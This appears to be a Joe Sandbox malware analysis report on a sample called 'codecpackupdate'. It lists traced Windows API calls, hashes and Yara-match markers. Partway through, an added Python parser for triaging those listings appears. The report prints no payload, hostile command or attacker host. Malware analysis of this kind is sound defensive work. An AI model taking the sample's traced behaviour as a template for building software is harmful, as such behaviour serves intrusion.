                                                                          • Instruction Fuzzy Hash: A621ECB0841310ABC2109F16EF4D9167EB8EBCA758F11413AE105BA2B2C7B94575CFAE
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • RtlDecodePointer.NTDLL(?), ref: 00A0827A
                                                                          • _free.LIBCMT ref: 00A08293
                                                                            • Part of subcall function 00A02EB4: HeapFree.KERNEL32(00000000,00000000,?,00A05C12,00000000,00000104,74DF0A60), ref: 00A02EC8
                                                                            • Part of subcall function 00A02EB4: GetLastError.KERNEL32(00000000,?,00A05C12,00000000,00000104,74DF0A60), ref: 00A02EDA
                                                                          • _free.LIBCMT ref: 00A082A6
                                                                          • _free.LIBCMT ref: 00A082C4
                                                                          • _free.LIBCMT ref: 00A082D6
                                                                          • _free.LIBCMT ref: 00A082E7
                                                                          • _free.LIBCMT ref: 00A082F2
                                                                          • _free.LIBCMT ref: 00A08316
                                                                          • RtlEncodePointer.NTDLL(008FAC10), ref: 00A0831D
                                                                          • _free.LIBCMT ref: 00A08332
                                                                          • _free.LIBCMT ref: 00A08348
                                                                          • _free.LIBCMT ref: 00A08370
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: _free$Pointer$DecodeEncodeErrorFreeHeapLast
                                                                          • String ID:
                                                                          • API String ID: 3064303923-0
                                                                          • Opcode ID: fb05ec1cd427dc423d612da55e4c6fd952a49807446406230ce487482f852e64
                                                                          • Instruction ID: ea012e58441ed3964331dfe05b118dd6b5e987df6773556f692204472788f7f6
                                                                          • Opcode Fuzzy Hash: fb05ec1cd427dc423d612da55e4c6fd952a49807446406230ce487482f852e64
                                                                          • Instruction Fuzzy Hash: 57219E32946618DBCB3AEF98FD446673B60AF057203094039E944572E1CA389C47CB95
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 009F3428
                                                                          • GetModuleHandleA.KERNEL32(KERNEL32,CancelIoEx), ref: 009F346B
                                                                          • GetProcAddress.KERNEL32(00000000), ref: 009F3472
                                                                          • GetLastError.KERNEL32 ref: 009F3486
                                                                          • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 009F34D7
                                                                          • RtlEnterCriticalSection.NTDLL(00000018), ref: 009F34ED
                                                                          • RtlLeaveCriticalSection.NTDLL(00000018), ref: 009F3518
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CriticalSection$AddressCompareEnterErrorExchangeH_prologHandleInterlockedLastLeaveModuleProc
                                                                          • String ID: CancelIoEx$KERNEL32
                                                                          • API String ID: 2902213904-434325024
                                                                          • Opcode ID: 2913399f54ae82b49cba1bc21a575ca9dc5673006b700d1888d3301fb386c77a
                                                                          • Instruction ID: 3093710ff5725cf828bd612bc3c60b4f79e11c91880fe3ccf2475ef90a516563
                                                                          • Opcode Fuzzy Hash: 2913399f54ae82b49cba1bc21a575ca9dc5673006b700d1888d3301fb386c77a
                                                                          • Instruction Fuzzy Hash: 7F319CB1900319DFCB01EFA4C984AAEBBF8FF49311F008469F9199B251C778DA01CBA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • LoadLibraryA.KERNEL32(user32.dll,?,00000000,?,00404D1D,?,Microsoft Visual C++ Runtime Library,00012010,?,00406530,?,00406580,?,?,?,Runtime Error!Program: ), ref: 00405869
                                                                          • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 00405881
                                                                          • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 00405892
                                                                          • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 0040589F
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2867652941.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.2867652941.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_codecpackupdate.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc$LibraryLoad
                                                                          • String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll
                                                                          • API String ID: 2238633743-4044615076
                                                                          • Opcode ID: a1fdb014e8dea29639177d20d343b616e560619fb48a784863710210177faac4
                                                                          • Instruction ID: 8e14f7a6750b1570260f033f2342e22bcd7c780a38ad1719db35514165c9b09a
                                                                          • Opcode Fuzzy Hash: a1fdb014e8dea29639177d20d343b616e560619fb48a784863710210177faac4
                                                                          • Instruction Fuzzy Hash: 9F015232600701AFDB11EFB5AD80A1B3BE8EB45740315043AB909F2591D678D8359F69
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • LCMapStringW.KERNEL32(00000000,00000100,004065FC,00000001,00000000,00000000,00000103,00000001,00000000,?,00404E93,00200020,00000000,?,00000000,00000000), ref: 00405B61
                                                                          • LCMapStringA.KERNEL32(00000000,00000100,004065F8,00000001,00000000,00000000,?,00404E93,00200020,00000000,?,00000000,00000000,00000001), ref: 00405B7D
                                                                          • LCMapStringA.KERNEL32(00000000,?,00000000,00200020,00404E93,?,00000103,00000001,00000000,?,00404E93,00200020,00000000,?,00000000,00000000), ref: 00405BC6
                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000002,00000000,00200020,00000000,00000000,00000103,00000001,00000000,?,00404E93,00200020,00000000,?,00000000,00000000), ref: 00405BFE
                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00200020,?,00000000,?,00404E93,00200020,00000000,?,00000000), ref: 00405C56
                                                                          • LCMapStringW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,?,00404E93,00200020,00000000,?,00000000), ref: 00405C6C
                                                                          • LCMapStringW.KERNEL32(00000000,?,00404E93,00000000,00404E93,?,?,00404E93,00200020,00000000,?,00000000), ref: 00405C9F
                                                                          • LCMapStringW.KERNEL32(00000000,?,?,?,?,00000000,?,00404E93,00200020,00000000,?,00000000), ref: 00405D07
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2867652941.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.2867652941.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_codecpackupdate.jbxd
                                                                          Similarity
                                                                          • API ID: String$ByteCharMultiWide
                                                                          • String ID:
                                                                          • API String ID: 352835431-0
                                                                          • Opcode ID: 585e295b11037126dfcd064dc94fe4f66704bff1de9b4c7a404ff84c747eed69
                                                                          • Instruction ID: 228655485731442308ac41690fb54a5bf4aece3cc6a962a44786cceaeb1d8e11
                                                                          • Opcode Fuzzy Hash: 585e295b11037126dfcd064dc94fe4f66704bff1de9b4c7a404ff84c747eed69
                                                                          • Instruction Fuzzy Hash: 94518931504609AFDF228F55CD45EAF7FB9EB48744F20412AF912B12A0D3398D21DF69
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

APIs
• GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000), ref: 00404C66
• GetStdHandle.KERNEL32(000000F4,00406530,00000000,?,00000000,00000000), ref: 00404D3C
• WriteFile.KERNEL32(00000000), ref: 00404D43
Strings
Memory Dump Source
• Source File: 00000003.00000002.2867652941.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2867652941.0000000000409000.00000040.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_codecpackupdate.jbxd
Similarity
• API ID: File$HandleModuleNameWrite
• String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
• API String ID: 3784150691-4022980321
• Opcode ID: b6dd7ce0089c197cf693ca265a150b89f405fd2be0e3a5b5ca2c0cc9865f6c54
• Instruction ID: f140c2e8ca9dd112070b7b1a63e93dd9695d020ae797257d07982e8dddccbb03
• Opcode Fuzzy Hash: b6dd7ce0089c197cf693ca265a150b89f405fd2be0e3a5b5ca2c0cc9865f6c54
• Instruction Fuzzy Hash: 5531E5B2A012186FEF20E760DE49FDA336CEF85304F1005BBF945B61D0D6B89E548A19
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00402FA6), ref: 0040472B
• GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00402FA6), ref: 0040473F
• GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00402FA6), ref: 0040476B
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00402FA6), ref: 004047A3
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00402FA6), ref: 004047C5
• FreeEnvironmentStringsW.KERNEL32(00000000,?,00000000,?,?,?,?,00402FA6), ref: 004047DE
• GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00402FA6), ref: 004047F1
• FreeEnvironmentStringsA.KERNEL32(00000000), ref: 0040482F
Memory Dump Source
• Source File: 00000003.00000002.2867652941.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2867652941.0000000000409000.00000040.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_codecpackupdate.jbxd
Similarity
• API ID: EnvironmentStrings$ByteCharFreeMultiWide
• String ID:
• API String ID: 1823725401-0
• Opcode ID: 3561de5b01a372d6e215d3622bd3220d2b84138c13fabd42e705c73002b4d0d2
• Instruction ID: 34ba4f5269201e1e594d4a21fe80140370f79d481ab45775fabf70a7e665ef6c
• Opcode Fuzzy Hash: 3561de5b01a372d6e215d3622bd3220d2b84138c13fabd42e705c73002b4d0d2
• Instruction Fuzzy Hash: E631C2F75042656FD7207FB99D8483BB69CE6C6358716093BFB42F3280D7798C4182AA
Uniqueness

Uniqueness Score: -1.00%

APIs
• OpenEventA.KERNEL32(00100002,00000000,00000000,35B6412D), ref: 00A015F0
• CloseHandle.KERNEL32(00000000), ref: 00A01605
• ResetEvent.KERNEL32(00000000,35B6412D), ref: 00A0160F
• CloseHandle.KERNEL32(00000000,35B6412D), ref: 00A01644
• CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,35B6412D), ref: 00A016BA
• CloseHandle.KERNEL32(00000000), ref: 00A016CF
Memory Dump Source
• Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
Yara matches
Similarity
• API ID: CloseEventHandle$CreateOpenReset
• String ID:
• API String ID: 1285874450-0
• Opcode ID: a16bf58e775abc246a528a1f3645127b2d31711805e3ca5ebc1f5cf0ba5a59ea
• Instruction ID: b7feb1f5d26a83795396475213955868c9da5ad5b48f35c8228ccb61b7158648
• Opcode Fuzzy Hash: a16bf58e775abc246a528a1f3645127b2d31711805e3ca5ebc1f5cf0ba5a59ea
• Instruction Fuzzy Hash: 1D412C71D0435CABDF21CFA5DD84BEEBBB8AB05724F144219E819AB2C1D7719905CB90
Uniqueness

Uniqueness Score: -1.00%

APIs
• InterlockedExchange.KERNEL32(?,00000001), ref: 009F20AC
• SetWaitableTimer.KERNEL32(00000000,?,00000001,00000000,00000000,00000000), ref: 009F20CD
• InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 009F20D8
• InterlockedDecrement.KERNEL32(?), ref: 009F213E
• GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000001F4,?), ref: 009F217A
• InterlockedDecrement.KERNEL32(?), ref: 009F2187
• InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 009F21A6
Memory Dump Source
• Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
Yara matches
Similarity
• API ID: Interlocked$Exchange$Decrement$CompletionQueuedStatusTimerWaitable
• String ID:
• API String ID: 1171374749-0
• Opcode ID: 0bfa594cc17542cc7bb13588c7c71204a29f49f95be937485b39a493a555da76
• Instruction ID: 8e6498f98fcf493d178d7c0fec3c526ae44a248fe83ad90ab089f59c3b1af1b1
• Opcode Fuzzy Hash: 0bfa594cc17542cc7bb13588c7c71204a29f49f95be937485b39a493a555da76
• Instruction Fuzzy Hash: 81415B715087059FC311DF65D885A6BBBF9FFC8750F044A1EF59682250DB30E906CBA6
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00A01E10: OpenEventA.KERNEL32(00100002,00000000,?,?,?,00A0166E,?,?), ref: 00A01E3F
  • Part of subcall function 00A01E10: CloseHandle.KERNEL32(00000000,?,?,00A0166E,?,?), ref: 00A01E54
  • Part of subcall function 00A01E10: SetEvent.KERNEL32(00000000,00A0166E,?,?), ref: 00A01E67
• OpenEventA.KERNEL32(00100002,00000000,00000000,35B6412D), ref: 00A015F0
• CloseHandle.KERNEL32(00000000), ref: 00A01605
• ResetEvent.KERNEL32(00000000,35B6412D), ref: 00A0160F
• CloseHandle.KERNEL32(00000000,35B6412D), ref: 00A01644
• __CxxThrowException@8.LIBCMT ref: 00A01675
  • Part of subcall function 00A0449A: RaiseException.KERNEL32(?,?,009FFA92,?,?,?,?,?,?,?,009FFA92,?,00A20F78,?), ref: 00A044EF
• CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,35B6412D), ref: 00A016BA
• CloseHandle.KERNEL32(00000000), ref: 00A016CF
  • Part of subcall function 00A01B50: GetCurrentProcessId.KERNEL32(?), ref: 00A01BA9
• WaitForSingleObject.KERNEL32(00000000,000000FF,35B6412D), ref: 00A016DF
Memory Dump Source
• Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
Yara matches
Similarity
• API ID: Event$CloseHandle$Open$CreateCurrentExceptionException@8ObjectProcessRaiseResetSingleThrowWait
• String ID:
• API String ID: 2227236058-0
• Opcode ID: 1c643fdc53387f76089f0bea272235a900bb8fa892d7f0acd0072e41d120381d
• Instruction ID: 207df51d07f2903d051ae77b415bf30270a0dc372a206434ce0646d7059474a0
• Opcode Fuzzy Hash: 1c643fdc53387f76089f0bea272235a900bb8fa892d7f0acd0072e41d120381d
• Instruction Fuzzy Hash: FA314C71D0435CABDF21DBE4EC85BEDB7B8AF05315F184219E819EB2C1E722A9058B51
Uniqueness

Uniqueness Score: -1.00%

APIs
• __init_pointers.LIBCMT ref: 00A05CD4
  • Part of subcall function 00A08442: RtlEncodePointer.NTDLL(00000000), ref: 00A08445
  • Part of subcall function 00A08442: __initp_misc_winsig.LIBCMT ref: 00A08460
  • Part of subcall function 00A08442: GetModuleHandleW.KERNEL32(kernel32.dll,?,00A21578,00000008,00000003,00A20F5C,?,00000001), ref: 00A091C1
  • Part of subcall function 00A08442: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00A091D5
  • Part of subcall function 00A08442: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00A091E8
  • Part of subcall function 00A08442: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00A091FB
  • Part of subcall function 00A08442: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00A0920E
  • Part of subcall function 00A08442: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00A09221
  • Part of subcall function 00A08442: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00A09234
  • Part of subcall function 00A08442: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00A09247
  • Part of subcall function 00A08442: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00A0925A
  • Part of subcall function 00A08442: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00A0926D
  • Part of subcall function 00A08442: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00A09280
  • Part of subcall function 00A08442: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00A09293
  • Part of subcall function 00A08442: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00A092A6
  • Part of subcall function 00A08442: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00A092B9
  • Part of subcall function 00A08442: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00A092CC
  • Part of subcall function 00A08442: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00A092DF
• __mtinitlocks.LIBCMT ref: 00A05CD9
• __mtterm.LIBCMT ref: 00A05CE2
  • Part of subcall function 00A05D4A: RtlDeleteCriticalSection.NTDLL(00000000), ref: 00A08878
  • Part of subcall function 00A05D4A: _free.LIBCMT ref: 00A0887F
  • Part of subcall function 00A05D4A: RtlDeleteCriticalSection.NTDLL(00A23978), ref: 00A088A1
• __calloc_crt.LIBCMT ref: 00A05D07
• __initptd.LIBCMT ref: 00A05D29
• GetCurrentThreadId.KERNEL32 ref: 00A05D30
Memory Dump Source
• Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
Yara matches
Similarity
• API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
• String ID:
• API String ID: 3567560977-0
• Opcode ID: 4757c06a70b5e510f948b6c630bda60a8a0f7c3707e468959617c6f626d8b03a
• Instruction ID: 1240caf5324f7a97a03f55e3b9033cef11d5cdfc260e9be72f96d7a1b3f4643a
• Opcode Fuzzy Hash: 4757c06a70b5e510f948b6c630bda60a8a0f7c3707e468959617c6f626d8b03a
• Instruction Fuzzy Hash: 67F0BB32959B191FE674B7B97E0B65B2784DF01770B200A1AF455C90D1FF198C424D55
Uniqueness

Uniqueness Score: -1.00%
                                                                          Uniqueness Score: -1.00%
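To triage "APIs" listings like the ones above at scale, the following Python parser (an added example, not part of the Joe Sandbox report or its IDA plugin) turns the bullet lines into records, lists the names this sample resolves through GetProcAddress at run time, and decodes the OpenEventA access mask. The sample lines are copied verbatim from the blocks above; the EVENT_* bit values are the Windows SDK constants, and the record field names are my own.

```python
"""Parse Joe Sandbox 'APIs' bullet lines into structured records (added example)."""
import re
from collections import Counter
from dataclasses import dataclass
from typing import Optional

# Constructed sample: lines copied from the report's 0x9F1000 CRT-init block
# and its named-event block.
SAMPLE = """\
• __init_pointers.LIBCMT ref: 00A05CD4
  • Part of subcall function 00A08442: RtlEncodePointer.NTDLL(00000000), ref: 00A08445
  • Part of subcall function 00A08442: GetModuleHandleW.KERNEL32(kernel32.dll,?,00A21578,00000008,00000003,00A20F5C,?,00000001), ref: 00A091C1
  • Part of subcall function 00A08442: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00A091D5
  • Part of subcall function 00A08442: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00A09234
  • Part of subcall function 00A08442: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00A09280
• __mtinitlocks.LIBCMT ref: 00A05CD9
  • Part of subcall function 00A05D4A: RtlDeleteCriticalSection.NTDLL(00000000), ref: 00A08878
• GetCurrentThreadId.KERNEL32 ref: 00A05D30
• OpenEventA.KERNEL32(00100002,00000000,00000000,35B6412D), ref: 00A015F0
• CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,35B6412D), ref: 00A016BA
"""

# "• [Part of subcall function X: ]Name.MODULE[(args)][,] ref: ADDR"
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<caller>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[\w@]+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r"\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
HEX_WORD = re.compile(r"^[0-9A-Fa-f]{8}$")


@dataclass(frozen=True)
class ApiCall:
    name: str
    module: str
    args: tuple            # raw argument words exactly as the report prints them
    ref: int               # address of the call site
    caller: Optional[int]  # set when the line is a "Part of subcall function X" entry


def parse_api_lines(text: str) -> list:
    """Return one ApiCall per bullet line; headers and non-API lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        args = tuple(m["args"].split(",")) if m["args"] else ()
        calls.append(ApiCall(
            name=m["name"], module=m["module"], args=args,
            ref=int(m["ref"], 16),
            caller=int(m["caller"], 16) if m["caller"] else None,
        ))
    return calls


def string_args(call: ApiCall) -> list:
    """Arguments that are neither 8-digit hex words nor '?' (unknown): literal strings."""
    return [a for a in call.args if a != "?" and not HEX_WORD.match(a)]


def dynamically_resolved(calls) -> list:
    """Export names requested via GetProcAddress, i.e. resolved at run time."""
    names = []
    for c in calls:
        if c.name == "GetProcAddress" and len(c.args) >= 2:
            names.extend(string_args(c))
    return names


# Event object access rights (Windows SDK values).
EVENT_ACCESS = {0x00100000: "SYNCHRONIZE", 0x00000002: "EVENT_MODIFY_STATE"}


def decode_access_mask(word: str, table=EVENT_ACCESS) -> list:
    """Expand a hex dwDesiredAccess word into the named bits it contains."""
    value = int(word, 16)
    return [name for bit, name in sorted(table.items()) if value & bit]


def module_histogram(calls) -> dict:
    return dict(Counter(c.module for c in calls))


if __name__ == "__main__":
    calls = parse_api_lines(SAMPLE)
    print(module_histogram(calls))
    print("runtime-resolved:", dynamically_resolved(calls))
    print("OpenEventA access:", decode_access_mask(calls[9].args[0]))
```

Every runtime-resolved name in this sample (FlsAlloc, CreateEventExW, SetThreadpoolTimer and the rest of that GetProcAddress run) is one the MSVC CRT probes kernel32 for during its own start-up, so that block is CRT initialisation rather than the payload hiding its imports; the named-event calls at 0x00A015F0 and 0x00A016BA, which open the event with SYNCHRONIZE | EVENT_MODIFY_STATE, are the ones that describe the sample's own behaviour.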

APIs
• LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,?,00A033B6,00000000), ref: 00A0341E
• GetProcAddress.KERNEL32(00000000), ref: 00A03425
• RtlEncodePointer.NTDLL(00000000), ref: 00A03431
• RtlDecodePointer.NTDLL(00000001), ref: 00A0344E
Strings
Memory Dump Source
• Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
Yara matches
Similarity
• API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
• String ID: RoInitialize$combase.dll
• API String ID: 3489934621-340411864
• Opcode ID: 723ec0efad399e08f2292c87da9f8fe8d038ae16efa26416b9c1bc963c9e0963
• Instruction ID: f7a79b5ae40f4cebbf463811c4019ef4e3498e1b35f25ed3a15ef02bcde58af0
• Opcode Fuzzy Hash: 723ec0efad399e08f2292c87da9f8fe8d038ae16efa26416b9c1bc963c9e0963
• Instruction Fuzzy Hash: 4EE0E570AA9304FADA209FB8AC49FAA367AB700B47F40D570B106D51F0CAB946979B10
Uniqueness

Uniqueness Score: -1.00%

APIs
• LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00A033F3), ref: 00A034F3
• GetProcAddress.KERNEL32(00000000), ref: 00A034FA
• RtlEncodePointer.NTDLL(00000000), ref: 00A03505
• RtlDecodePointer.NTDLL(00A033F3), ref: 00A03520
Strings
Memory Dump Source
• Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
Yara matches
Similarity
• API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
• String ID: RoUninitialize$combase.dll
• API String ID: 3489934621-2819208100
• Opcode ID: e3e62412b5dc2c13d24dcf883228bf3b4031eac79fae0208c73ee2a24bdd1e3d
• Instruction ID: d29b8691d32f454b9f24b58925c2e40393158b16f3adb3c895b6960365efdab8
• Opcode Fuzzy Hash: e3e62412b5dc2c13d24dcf883228bf3b4031eac79fae0208c73ee2a24bdd1e3d
• Instruction Fuzzy Hash: 24E0927059A304BBDA309FE4AC09F9A3A79F714702F109524FA06A12B0CBB856429A14
Uniqueness

Uniqueness Score: -1.00%

APIs
• TlsGetValue.KERNEL32(00000025,35B6412D,?,?,?,?,00000000,00A169F8,000000FF,00A0210A), ref: 00A01EAA
• TlsSetValue.KERNEL32(00000025,00A0210A,?,?,00000000), ref: 00A01F17
• GetProcessHeap.KERNEL32(00000000,00000000), ref: 00A01F41
• HeapFree.KERNEL32(00000000), ref: 00A01F44
Memory Dump Source
• Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
Yara matches
Similarity
• API ID: HeapValue$FreeProcess
• String ID:
• API String ID: 1812714009-0
• Opcode ID: 6a5672e674274c5126c8cb629383672b500799f2e942ee5d1031b46bd5d54ac2
• Instruction ID: 85097f9296792a2e186c23b782960728d9941bf6acc5c3d5c918d3c5978cdd62
• Opcode Fuzzy Hash: 6a5672e674274c5126c8cb629383672b500799f2e942ee5d1031b46bd5d54ac2
• Instruction Fuzzy Hash: 2651BF316043099FC720DF68E888FAABBF4FB49764F058669F859972D0D730AC01CB90
Uniqueness

Uniqueness Score: -1.00%

APIs
• _ValidateScopeTableHandlers.LIBCMT ref: 00A156D0
• __FindPESection.LIBCMT ref: 00A156EA
Memory Dump Source
• Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
Yara matches
Similarity
• API ID: FindHandlersScopeSectionTableValidate
• String ID:
• API String ID: 876702719-0
• Opcode ID: 7f9e4a4991c6b06ec3bbadc81c6e7dc1117e8d5d3b3382208bd01729809b35fb
• Instruction ID: 2071d0c0a688222eb6f9e87e9b1443c372e41b3f07cd60ed4c933ac0f838a1d5
• Opcode Fuzzy Hash: 7f9e4a4991c6b06ec3bbadc81c6e7dc1117e8d5d3b3382208bd01729809b35fb
• Instruction Fuzzy Hash: 79A1AE75E04A15CFCB24CF68D981AEDB7E5FB84320F184669EC15AB291E731ED81CB90
Uniqueness

Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • GetStringTypeW.KERNEL32(00000001,004065FC,00000001,00000000,00000103,00000001,00000000,00404E93,00200020,00000000,?,00000000,00000000,00000001), ref: 00405DAD
                                                                          • GetStringTypeA.KERNEL32(00000000,00000001,004065F8,00000001,?,?,00000000,00000000,00000001), ref: 00405DC7
                                                                          • GetStringTypeA.KERNEL32(00000000,00000000,?,00000000,00200020,00000103,00000001,00000000,00404E93,00200020,00000000,?,00000000,00000000,00000001), ref: 00405DFB
                                                                          • MultiByteToWideChar.KERNEL32(00404E93,00000002,?,00000000,00000000,00000000,00000103,00000001,00000000,00404E93,00200020,00000000,?,00000000,00000000,00000001), ref: 00405E33
                                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405E89
                                                                          • GetStringTypeW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405E9B
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2867652941.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.2867652941.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_codecpackupdate.jbxd
                                                                          Similarity
                                                                          • API ID: StringType$ByteCharMultiWide
                                                                          • String ID:
                                                                          • API String ID: 3852931651-0
                                                                          • Opcode ID: 299ca15397ebee838ff06567ddbc0ab6f29b8118cf23d418261883c500b25a22
                                                                          • Instruction ID: 80e02ee10c910d5558e83bb499fc0990029bfad3b9a08e1f349c60d3d592f295
                                                                          • Opcode Fuzzy Hash: 299ca15397ebee838ff06567ddbc0ab6f29b8118cf23d418261883c500b25a22
                                                                          • Instruction Fuzzy Hash: D5416C72540619AFCF109FA4DD85AAF3F69FB08710F10443AF912F6290C3399A619BA9
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 009F1CB1
